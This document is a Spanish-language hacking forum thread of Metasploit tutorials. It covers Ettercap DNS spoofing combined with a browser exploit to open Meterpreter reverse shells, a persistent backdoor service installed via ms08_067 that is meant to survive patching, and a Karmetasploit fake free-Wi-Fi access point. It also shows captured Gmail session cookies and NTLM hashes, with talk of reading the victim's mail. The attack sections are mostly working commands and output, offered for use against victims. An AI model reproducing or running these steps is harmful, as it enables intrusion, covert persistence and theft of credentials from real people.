Temas

[[Metasploit By: Shell Root]]

[Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
[Metasploit By: Shell Root]

Miremos que tal hacen un Duo Ettercap y Metasploit (Un Duo Letal... xD). Miremos como hacer una suplantación de nombre de dominio, para la ejecución inconciente de una URL infectada con un exploit del Metasploit, devolviendo una session del Meterpreter.

Primero instalemos el Ettercap: Esta herramienta esta dentro de los repositorios

Código [Seleccionar] Expandir

shell@ShellRoot:~$ sudo apt-get install ettercap

Ahora entremos entraremos a la siguiente ruta /usr/share/ettercap/, donde se encuentra el archivo etter.dns. (En este archivo, incluiremos unas lineas). Lo abrimos así:

Código [Seleccionar] Expandir

shell@ShellRoot:~$ sudo gedit /usr/share/ettercap/etter.dns
[sudo] password for shell: *******

Buscamos la siguiente linea:

Código [Seleccionar] Expandir

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#

Y le agregamos:

Código [Seleccionar] Expandir

* A 192.168.0.3:8080
Nota: El * para que cuando entre a cualquier URL se redireccione a la URL Infectada. Podemos poner el Host que deseemos si no quieren poner el *. : P

Ahora entramos el Metasploit y seleccionamos el exploit windows/browser/ani_loadimage_chunksize o windows/browser/ms09_002_memory_corruption

Código [Seleccionar] Expandir

shell@ShellRoot:~/msf3$ ./msfconsole

                                 _            
                                | |      o    
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |  
 |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                          /|                  
                          \|                  


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) >

Modificamos el parametro URIPATH para que no nos saque un Ramdom sino un Slash

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /

Ahora seleccionamos el PAYLOAD, en este caso windows/meterpreter/reverse_tcp

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


Ingresamos el parametro LHOST

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.0.3
LHOST => 192.168.0.3

Miramos que todo esque bien y ejecutamos el exploit

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process
  LHOST     192.168.0.3      yes       The local address
  LPORT     4444             yes       The local port


Exploit target:

  Id  Name
  --  ----
  0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.3:8080/
[*] Server started.


Ahora entramos a la shell e iniciamos el sniffer del ettercap

Código [Seleccionar] Expandir

shell@ShellRoot:~$ sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.0.5/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

 eth0 -> 00:0C:29:AE:81:42       192.168.0.5     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

etter.dns:41 Invalid ip address
 28 plugins
 39 protocol dissectors
 53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:


GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Nota: Dejamos esta ventana quieta y esperemos a que la Victima inicie cualquier pagina web.

Waiting... Despues de esperar unos 3 Min... : P, miramos que hemos conseguido una session del Meterpreter... :O

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.0.5:1130...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.0.5:1130...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.5:1131)


Ahora solo bastara con mirar las Sesiones con el comando sessions -l y para selecciona una sesion con el comando sessions -i Numero_Session. Asi:

Código [Seleccionar] Expandir

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Adaptador Ethernet PCI AMD PCNET Family - Minipuerto del administrador de paquetes
Hardware MAC: 00:0c:29:8f:90:c4
IP Address  : 192.168.0.5
Netmask     : 255.255.255.0


meterpreter >

Con esto damos por concluido el tutorial y ver el poder que tienen estas dos herramientas, si se usan conjuntamente. Esto es lo basico, esperen el resto... ;·)

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2010/01/ettercap-metasploit-suplantacion-de.html
Video: Nothing...

[[Metasploit] Crear un Backdoor con meterpreter]

[Metasploit] Crear un Backdoor con meterpreter

Primero, necesitamos una sesión de meterpreter en el sistema remoto.

Código [Seleccionar] Expandir


                                  _             
                                 | |      o     
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  | 
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                   
                           \|                   


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >


Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código [Seleccionar] Expandir


meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.


Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código [Seleccionar] Expandir


meterpreter > reboot
Rebooting...
meterpreter >


Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código [Seleccionar] Expandir


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >


Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código [Seleccionar] Expandir


meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
* Stopping service metsvc
* Removing service
Service metsvc successfully removed.

meterpreter >


Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Un saludo.

Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100609.0.html

[Fuente:]

KARMETASPLOIT

   Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

CONFIGURACIÓN

   Se necesita una pequeña instalación para poner en marcha Karmetasploit, el primer paso es obterner el plugin para nuestro Metasploit Framework.

Código [Seleccionar] Expandir

wget http://metasploit.com/users/hdm/tools/karma.rc

   Una vez descagado, necesitamos configurar un poco la infraestructura que necesitaremos. Cuando los cientes se conecten al AP falso que tenemos, estarán esperando que se les asigne una IP, por eso necesitamos un pequeño servidor DHCP, así que vamos a instalar dhcpd3-server y a configurarlo.

Código [Seleccionar] Expandir


sudo apt-get install dhcpd3-server
sudo gedit /etc/dhcp3/dhcpd.conf

y lo dejamos así:

Código [Seleccionar] Expandir


option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
 range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1;
 option domain-name-servers 10.0.0.1;
}


   También necesitaremos instalar un par de cositas más.

Código [Seleccionar] Expandir

sudo gem install activerecord sqlite3-ruby

   Ahora estamos preparados para empezar.

EMPEZANDO

   Primero, vamos a poner nuestra tarjeta wireless en modo monitor

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo/Hacklab# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
878 avahi-daemon
879 avahi-daemon
1012 NetworkManager
1041 wpa_supplicant


Interface Chipset Driver

eth1 Unknown wl
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

root@trashhgoo:/home/trashhgoo/Hacklab#


Como sabréis, airmon-ng nos crea un dispositivo virtual en modo monitor, en este caso mon0, y es sobre el que vamos a levantar el AP.

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo/Hacklab# airbase-ng -P -C 30 -e "WIFI_GRATUITO" -v mon0
23:39:19  Created tap interface at0
23:39:19  Trying to set MTU on at0 to 1500
23:39:19  Trying to set MTU on mon0 to 1800
23:39:19  Access Point with BSSID 00:24:01:12:3E:A6 started.


Esto nos creó una interfaz nueva, que está trabajando como AP, en mi caso: at0

¿Qué hacemos ahora? Asignarle una IP y arrancar el servidor DHCP (Asignador de IP's automáticas, para el que no lo sepa) en él, así que abrimos otro shell, dejando el airbase-ng trabajando.

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.


No le hagáis caso al "Permission denied", es sólo que no pudo crear un archivo (Este dhcpd3 es un protestón).

Pues ya está funcionando! Qué os parece? No es maravilloso?

No?

Bueno, pues entonces vamos a seguir, que hasta ahora sólo lo estábamos preparando.

UTILIZANDO KARMETASPLOIT

Si utilizáis metasploit 3.2, tenéis que guardar karma.rb en la carpeta donde está msfconsole, si usáis la 3.3, tenéis que estar en la carpeta donde lo tenéis guardado o asignar la carpeta donde lo tenemos guardado.

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo# cd Hacklab
root@trashhgoo:/home/trashhgoo/Hacklab# ls karma.rc
karma.rc


Lo tenéis? Pues vamos a poner en marcha el chiringuito con un sencillo comando.

Código [Seleccionar] Expandir

msfconsole -r karma.rc

También podría haber puesto msfconsole -r /home/trashhgoo/Hacklab/karma.rc
Y hala! A bailar! Ahora el propio msfconole es el que hará todo!
Empezará a levantar servers, que no son más que trampas para los incautos que se conecten a nuestro AP. Cuando parezca que se para, pulsemos ENTER.

Código [Seleccionar] Expandir


[*] Started reverse handler on port 3333
[*] Starting the payload handler...
[*] Started reverse handler on port 6666

[*] --- Done, found 14 exploit modules

[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://77.209.92.221:55550/ads
[*] Server started.

msf auxiliary(http) >


No os hacéis a una idea de la cantidad de exploits que tenemos cargados, a la espera de que algún incauto pique.

Y qué pasa si pican? Pues lo veremos ahora...

PICARON!!!!

Código [Seleccionar] Expandir


[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3;
MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage;
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Request '/ads' from 10.0.0.100:1278
[*] Recording detection from User-Agent
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Browser claims to be MSIE 5.01, running on Windows 2000
[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in
`check'/usr/lib/ruby/1.8/sqlite3/ resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby
1.8/sqlite3
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8


Vale, vale, vale... Un momento! Vamos a ver! Qué es todo esto?

Bien, todo esto son los datos que nos está enviando nuestra pesca, y algo interesante es por ejemplo ese par de cookies que nos acaban de regalar.

Código [Seleccionar] Expandir


[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8


SON PARA GMAIL!! Pues ya podemos acceder a su correo (Risa malévola, sonido de órgano y llamas infernales saliendo del suelo iluminando una sonrisa malvada).

Y aparte de esas pueden aparecernos muchas más, pero... Qué más puede pasar? Pues puede pasar que la pesca sea vulnerable a algún ataque, por lo que obtendríamos lo siguiente:

Código [Seleccionar] Expandir



[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions
===============

 Id  Description  Tunnel                            
 --  -----------  ------                            
 1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364



Oh! Una sesión de meterpreter! Y sin hacer nada! No es estupendo? No, es Karmetasploit.


Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100592.0.html

[[Metasploit By: Shell Root]]

Pasar Resultado de escaneo de Nmap al MSF
[Metasploit By: Shell Root]

En la practica anterior, pudimos observar como logramos pasar el resultado de un scanneo de Nessus, ahora veremos como hacer lo mismo, pero ahora con el scanner Nmap. Recordemos que realizamos este paso para un mejor y rapido acceso a los datos almacenados.

Primero que todo ingresemos a la consola del Metasploit. Despues crearemos una nueva base de datos, recordemos de eliminar la base de datos anteriores. Así:

Código [Seleccionar] Expandir

shell@ShellRoot:~/msf3$ ./msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > db_destroy
[*] Deleting /home/shell/.msf3/sqlite3.db...
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/shell/.msf3/sqlite3.db
msf >

Ahora escaneemos algunas IP's con el Nmap y la guardamos dentro de un archivo XML. Para posteriormente leer el archivo desde el Metasploit. El archivo lo llamaremos: Prueba1

Código [Seleccionar] Expandir

msf > nmap -v -sV 192.168.0.1/24 -oA /home/shell/Prueba1
[*] exec: nmap -v -sV 192.168.0.1/24 -oA /home/shell/Prueba1


Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-02 16:06 COT
Initiating Ping Scan at 16:06
Scanning 256 hosts [1 port/host]
Completed Ping Scan at 16:06, 1.03s elapsed (256 total hosts)
Initiating Parallel DNS resolution of 256 hosts. at 16:06
Completed Parallel DNS resolution of 256 hosts. at 16:06, 13.01s elapsed
Initiating Connect Scan at 16:06
Scanning 3 hosts [1715 ports/host]
Discovered open port 80/tcp on 192.168.0.1
Completed Connect Scan against 192.168.0.1 in 1.48s (2 hosts left)
Completed Connect Scan against 192.168.0.2 in 1.48s (1 host left)
Completed Connect Scan at 16:06, 1.48s elapsed (5145 total ports)
Initiating Service scan at 16:06
Scanning 1 service on 3 hosts
Completed Service scan at 16:06, 5.00s elapsed (1 service on 3 hosts)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 16:06
Completed SCRIPT ENGINE at 16:06, 0.01s elapsed
Host 192.168.0.1 appears to be up ... good.
Interesting ports on 192.168.0.1:
Not shown: 1714 closed ports
PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped

Host 192.168.0.2 appears to be up ... good.
All 1715 scanned ports on 192.168.0.2 are closed

Host 192.168.0.3 appears to be up ... good.
All 1715 scanned ports on 192.168.0.3 are closed

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 20.856 seconds
msf >

Despues miramos que opciones podemos ejecutar, Usando el comando Help... xD

Código [Seleccionar] Expandir

msf > help

Database Backend Commands
=========================

    Command               Description
    -------               -----------
    db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database
    db_create             Create a brand new database
    db_del_host           Delete one or more hosts from the database
    db_del_port           Delete one port from the database
    db_destroy            Drop an existing database
    db_disconnect         Disconnect from the current database instance
    db_driver             Specify a database driver
    db_hosts              List all hosts in the database
    db_import_amap_mlog   Import a THC-Amap scan results file (-o -m)
    db_import_nessus_nbe  Import a Nessus scan result file (NBE)
    db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
    db_import_nmap_xml    Import a Nmap scan results file (-oX)
    db_nmap               Executes nmap and records the output automatically
    db_notes              List all notes in the database
    db_services           List all services in the database
    db_vulns              List all vulnerabilities in the database
    db_workspace          Switch between database workspaces

msf >

Obviamente usamos el comando db_import_nmap_xml, que es el que nos permite la importacion del archivo XML que acabamos de crear con el Nmap.

Código [Seleccionar] Expandir

msf > db_import_nmap_xml /home/shell/Prueba1.xml
msf >

Ahora recordemos los comandos que usamos en el ejemplo de importacion de resultados del Scanner Nessus.

Miremos los hosts que escanneamos.

Código [Seleccionar] Expandir

msf > db_hosts

Hosts
=====

address      address6  arch  comm  created                         info  mac  name  os_flavor  os_lang  os_name  os_sp  state  Svcs  Vulns  Workspace
-------      --------  ----  ----  -------                         ----  ---  ----  ---------  -------  -------  -----  -----  ----  -----  ---------
192.168.0.1                        Sat Jan 02 16:10:47 -0500 2010                                                       alive  1     0      default
192.168.0.2                        Sat Jan 02 16:10:47 -0500 2010                                                       alive  0     0      default
192.168.0.3                        Sat Jan 02 16:10:47 -0500 2010                                                       alive  0     0      default

msf >

Ahora miremos los servicios que estan corriendo.

Código [Seleccionar] Expandir

msf > db_services

Services
========

created                         info  name  port  proto  state  Host         Workspace
-------                         ----  ----  ----  -----  -----  ----         ---------
Sat Jan 02 16:10:47 -0500 2010              80    tcp    open   192.168.0.1  default

msf >

Como este es un Scanner de puertos y no es tan pontente como el Nessus no podemos ejecutar el comando db_vulns y el db_autopwn, anque si los ejecutamos no aparecera nada... xD

BY: Shell Root

[[Metasploit By: Shell Root]]

Pasar Resultado de escaneo de Nessus al MSF
[Metasploit By: Shell Root]

Ahora en este tutorial, explicaré como pasar los resultados que nos arrojo el scaner Nessus al Metasploit. Porque hacer esto? Bueno, tendremos la informacion ordenada y lista para poner en ejecución el comando db_autopwn, que es el que se encarga de explotar las vulnerabilidas encontradas con el Scaner, automaticamente. Empecemos!

Inicializamos la consola del Metasploit

Código [Seleccionar] Expandir

shell@ShellRoot:~/msf3$ ./msfconsole

               ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                     ##


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf >


